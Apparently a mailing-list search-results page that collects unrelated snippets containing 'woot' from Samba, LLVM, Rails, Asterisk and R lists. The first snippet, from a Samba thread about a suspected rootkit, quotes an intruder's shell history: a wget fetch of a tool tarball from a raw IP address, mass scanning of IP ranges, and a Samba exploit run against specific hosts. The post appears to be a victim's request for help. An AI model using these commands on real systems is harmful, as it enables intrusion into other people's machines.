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2003 Dec 27
1
Faked samba packages / rootkit?
..... > 221 rm -fr psybnc > 222 wget http://62.211.66.12/pippo46/asmb.tar > 223 tar zyvf asmb.tar > 224 tar zxvf asmb.tar > 225 rm asmb.tar > 226 cd w00t/ > 227 ./asmb 120 > 228 ./asmb 110 > 229 ./asmb 217 > 230 ./asmb 217.229 > 231 cat woot.log > 232 ./samba -b 0 -v 217.229.113.107 > 233 ./asmb 217.46 > 234 ./asmb 217.228 > 235 cd /tmp/rk > 236 cd w00t/ > 237 ./asmb 194.142 > 238 ./samba -b 0 -v 194.142.156.50 > 239 ./asmb 195.165 > 240 ./asmb 195.240 > 241 ./asmb 195.80 >...
2005 Dec 15
0
Woot :D Wine and FC4 X64 :D
2005 Sep 13
0
First PRI Installed - WOOT
Today I got my first PRI installed. It literally took less than 5 minutes and the circuit was up and we were making calls. The T100P is performing excellent. The Linux/Asterisk box is running well and the quality is great. The line is from MCI and they did a great job. I know this is not the usual banter but I just thought I would share a good experience and throw out some props to Digium
2006 Oct 16
5
New Rails Site: http://www.tanga.com
http://www.tanga.com is where it''s at. We''re planning on open sourcing the e-commerce bits of it sometime in the near future. Any suggestions on how to best do that? (plugin? generator?) A non-video game will be offered for sale at 7 pm PST on Monday, btw. --~--~---------~--~----~------------~-------~--~----~ You received this message because you are subscribed to the
2007 Oct 11
4
[RSpec] Question about using TextMate Bundle...
Hey Everyone, First time poster! woot! Can someone please point me to a Wiki, FAQ, web page, that I can reference to help me debug why my installation of the TextMate Bundle doesn''t work? Am I supposed to install the gem, then install the plugins into a project, then install the bundle before the bundle can work? I can run...
2009 Jun 29
0
A graphic art piece I created that only statisticians would understand and the use of R in art
This isn't the typical r-help post, but I think people here will appreciate it. The current Shirt.Woot (http://shirt.woot.com) derby prompt is fake band names, so I chose the name "The Probable Error of a Mean." And I made my submission with R. Here it is: http://www.thomaslevine.org/the_probable_error_of_a_mean/poster.png http://shirt.woot.com/Derby/Entry.aspx?id=33029 I'm quite sur...
2016 Aug 26
2
[Progress Update] LLVM Runtimes Subdirectory
On 26 August 2016 at 23:22, Renato Golin <renato.golin at linaro.org> wrote: > Woot! Compiling RT as we speak... :) Right, all went well until I got this: [0/1] Re-running CMake... -- Builtin supported architectures: i386;x86_64 -- Configuring done -- Generating done -- Build files have been written to: /home/rengolin/devel/llvm/workdir/libs/build/runtimes/builtins-bins ninja: n...
2004 Jun 10
4
incoming DTMF on iConnectHere?
Hi, Anyone having problems receiving DTMF on incoming iConnectHere lines? They disappeared for us sometime in the last 12 hours... And, yes, we've restarted * and rebooted our * machine. Michael Swan Neon Software, Inc.
2010 Apr 30
1
Reverse engineering USB devices
I'm pretty sure this is the wrong list, but maybe some clever people here can redirect me... I have a "RCA RS2100 Bookshelf Audio System" http://www.woot.com/blog/viewentry.aspx?id=2744 This is radio/CD/mp3 player... PLUS it can stream audio wirelessly. You plug a USB device into your PC and you can remote control what gets played from the RS2100 remote control ("Wireless Musiclink"). BUT only with Windows Media Center. When I plugged th...
2005 Aug 11
1
Samba 3.0.14a Not restoring connections - Help ??
...ey had saved when mapping them. In the past when the local username and password matched the smbpasswd file then all connections restored w/o a hitch. Its now not working. Can anyone tell me what I am doing wrong? Below is my small smb.conf file global settings [global] netbios name = woot local master = yes preferred master = no workgroup = DNR interfaces = 146.63.45.22 lock directory = /var/lock/samba os level = 62 remote announce = 146.63.45..255 security = user password level = 20 encrypt passwords =...
2007 Apr 02
0
[LLVMdev] PR400 - alignment for LD/ST
...o can choose to > use it or > not. If the specified alignment matches the natural alignment, > then it > can be dropped (set to zero). I have changes in places to implement the bytecode/assembly/ instruction changes and propagate them through to SDNode creation in the back end. Woot. When a load or store instruction of alignment 0 (natural) is visited in SelectionDAGLowering, should it create an SDNode of alignment 0 or should it use the TargetData to set the SDNode's alignment to the preferred alignment for the load/store's type for that particular target? -...
2016 Aug 26
3
[Progress Update] LLVM Runtimes Subdirectory
Hi LLVM-Dev, Over the past week or so I’ve been working on build system improvements around the LLVM runtimes directory. You may remember this from the LLVM-Dev discussion (http://lists.llvm.org/pipermail/llvm-dev/2016-June/100859.html), or the patch review discussion (https://reviews.llvm.org/D20992) back in June. Recently, I’ve made a handful of new changes that actually make it useful, and I
2006 Apr 08
4
API rails
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2010 Jun 02
3
Fwd: Skeleton 4.0 draft, help with Dirac fields please!
On 31 May 2010 20:51, Chris Pearce <chris at pearce.org.nz> wrote: > Ok, thanks Silvia. I'll keep working on OggIndex/Skeleton 4.0 without > the new granulepos fields, and if they're ready in time I'll include > them, otherwise they can wait until Skeleton 4.x. I was waiting for Monty so summarize his ideas too, but from the irc discussion, it sounds like the extra
2009 Aug 12
2
AEC troubleshooting
First of all, thank you for your input Tim. That is very helpful. I would love to hear from other people with experience of AEC and Speex. I guess I have to split my question into to parts now. 1. Is it a fact that using the windows multimedia API (wave audio) for audio capture and playback makes it impossible to do echo cancellation with Speex AEC or other EC method due to inprecise timing? I
2009 Aug 27
2
[LLVMdev] Regular Expression lib support
2009/8/25 Török Edwin <edwintorok at gmail.com>: > On 2009-08-25 21:18, Daniel Dunbar wrote: >> Woot! Thanks a bunch Edwin! >> >> Some comments on the patch: >> -- >> I'm not sure if it makes sense to import the man pages, if we only >> expose Regex.h. >> > > I'd like to keep re_format.7, it describes the format of the regex as > accepted by thi...
2008 Dec 22
1
_NET_WM_FULLSCREEN_MONITORS hint (YAY!!)
...n more than one monitor (i.e. video players, etc.). Long story short, last Friday, I had just pulled out a git clone of compiz and was getting ready to start looking at patching _NET_WM_FULLSCREEN_MONITORS into Compiz and I discovered that Danny Baumann had done just that literally the day before. WOOT! Thank you Danny!!! I spent some time Friday in using the simple test application that David Trowbridge wrote (http://bugzilla.gnome.org/attachment.cgi?id=122703) that exercises _NET_WM_FULLSCREEN_MONITORS as well as using the multiple monitor feature of Workstation and things look really good! So...
2013 Feb 19
0
[LLVMdev] [RFC] NoBuiltin Attribute
...gt; >>> "no-builtin-functions" = "puts,foo,bar" >> >> I guess this could work, this means that simplifylibcalls (and others) would check this instead of TargetLibraryInfo? >> > Yes. Sounds good, much of TLI can just disappear when this happens, woot. >> Out of curiosity, how important is -fno-builtin-foo? Isn't it enough to just have -fno-builtin-foo disable *all* builtin optimizations for the unit of code being compiled? This is overly conservative - is that actually a problem for something? >> > Being overly conservati...
2007 Apr 01
4
[LLVMdev] PR400 - alignment for LD/ST
On Sun, 1 Apr 2007, Christopher Lamb wrote: > Also I wanted to clear something up about the meaning of the alignment > attribute. My thinking is that this indicates over/under alignment with > respect to natural alignment for the type. This is to say in the Load/Store > instruction classes the default alignment value will be zero, meaning natural > alignment for the given type.
2013 Jun 26
1
some feedbacks seen on btrfs
First off, thanks for an awesome file system, it is working well for my purposes of compressing a filesystem on a small VPS. Woot! I thought I''d call out a few things (in the hopes of spurring improvements) I''d seen about btrfs (in case they weren''t common knowledge...): http://linux.slashdot.org/story/13/04/26/1231213/btrfs-is-getting-there-but-not-quite-ready-for-production links to http://www.a...